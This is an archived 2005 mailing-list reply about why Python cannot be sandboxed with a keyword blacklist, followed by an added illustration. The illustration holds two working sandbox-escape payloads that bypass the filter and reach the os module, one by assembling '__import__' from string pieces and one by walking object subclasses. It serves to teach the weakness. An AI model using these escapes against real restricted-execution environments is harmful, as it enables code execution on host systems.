Sandboxes

Paul Rubin
Sat Aug 20 07:13:03 EDT 2005


42 <nospam at nospam.com> writes:
> Googling for information on securing Python in a "sandbox" seems to
> indicate that there are some built in features, but they aren't really 
> trustworthy. Is that correct?

Yes.

> For my purposes, I really just want to let users run in a sandbox, with 
> access to only the language, manipulate a few published objects in the 
> application (and perhaps give them some string and math libraries if 
> applicable).

If they are malicious, this is asking for trouble.

> I was wondering if it would be effective to pre-parse incoming scripts 
> and reject those containing "import"? I'd also have the application 
> inject the (short) list of trusted imports to the script before passing 
> it to the interpreter.

No, that's not enough.

> Would this be sufficient? Are there any drawbacks or giant gaping holes? 
> I'm anticipating that I'd also need to block 'exec' and 'eval' to 
> prevent an import from being obfuscated past the pre-parse.
> 
> Or is this a hopeless cause? 

Yes.  It's even difficult with Java and Javascript, which were designed
to have such security.
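
Added illustration of why the proposed blacklist is not enough (example code written for this page; it is not from the original thread or from Paul Rubin). The filter below implements the scheme the poster describes: reject any script whose source contains "import", "exec" or "eval", then run it with only the math and string modules published into its namespace. Two constructed payloads pass that filter and still reach the os module. The function and payload names are this example's own; the second payload relies on CPython 3 behaviour (os.py defines a class whose __init__ is a Python function, so its __globals__ is the os module's namespace).

```python
"""Why a keyword blacklist is not a Python sandbox (added example).

naive_filter() is the pre-parse proposed in the thread.  run_sandboxed()
runs an accepted script with only math and string "published".  Both
payloads below are accepted by the filter and still obtain the os module.
All names here are this example's own, not the original poster's code.
"""
import math
import os
import string

BLOCKED_WORDS = ("import", "exec", "eval")


def naive_filter(script: str) -> bool:
    """The proposed pre-parse: True if none of the blocked words appear."""
    return not any(word in script for word in BLOCKED_WORDS)


def run_sandboxed(script: str, strip_builtins: bool = False) -> dict:
    """Run an already-filtered script with only math/string published.

    With strip_builtins=True the script gets an empty __builtins__, the
    other common 'sandbox' suggestion.  Returns the script's namespace.
    """
    if not naive_filter(script):
        raise ValueError("script rejected by filter")
    ns = {"math": math, "string": string}
    if strip_builtins:
        ns["__builtins__"] = {}
    exec(script, ns)  # the host's own exec call, not the user's
    return ns


# Payload 1: builtins are present (default behaviour of exec when the
# namespace has no __builtins__ key).  __import__ is fetched from the
# builtins mapping under a name assembled at run time, so the literal
# substring "import" never appears in the source.
PAYLOAD_VIA_BUILTINS = """
b = getattr(__builtins__, '__dict__', __builtins__)   # module or dict
os_mod = b['__imp' + 'ort__']('os')
result = os_mod.getcwd()
"""

# Payload 2: even with __builtins__ = {} the script can walk from the
# empty tuple to object, list every loaded class, and take the os
# module's globals from a Python-level __init__ defined in os.py
# (CPython 3: os._wrap_close).  No builtin name is used at all.
PAYLOAD_VIA_SUBCLASSES = """
result = None
for cls in ().__class__.__base__.__subclasses__():
    try:
        g = cls.__init__.__globals__
    except:                       # slot wrappers have no __globals__
        continue
    if g.get('__name__') == 'os':
        result = g['getcwd']()
        break
"""


def escape_with_builtins() -> str:
    """Run payload 1 under the filter; returns the host's cwd if it escaped."""
    return run_sandboxed(PAYLOAD_VIA_BUILTINS)["result"]


def escape_without_builtins() -> str:
    """Run payload 2 with empty builtins; returns the host's cwd if it escaped."""
    return run_sandboxed(PAYLOAD_VIA_SUBCLASSES, strip_builtins=True)["result"]


def host_cwd() -> str:
    """What the payloads should not be able to learn: the host's cwd."""
    return os.getcwd()


if __name__ == "__main__":
    for payload in (PAYLOAD_VIA_BUILTINS, PAYLOAD_VIA_SUBCLASSES):
        print("filter accepts payload:", naive_filter(payload))
    print("escape via builtins   ->", escape_with_builtins() == host_cwd())
    print("escape via subclasses ->", escape_without_builtins() == host_cwd())
```

Both payloads are accepted by the filter and both return the host's working directory; swapping getcwd for system is a one-word change. The point of the exchange above is visible in the second payload in particular: the escape route is the object model of the language itself, not any one builtin, so removing keywords or builtins from the script does not close it.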


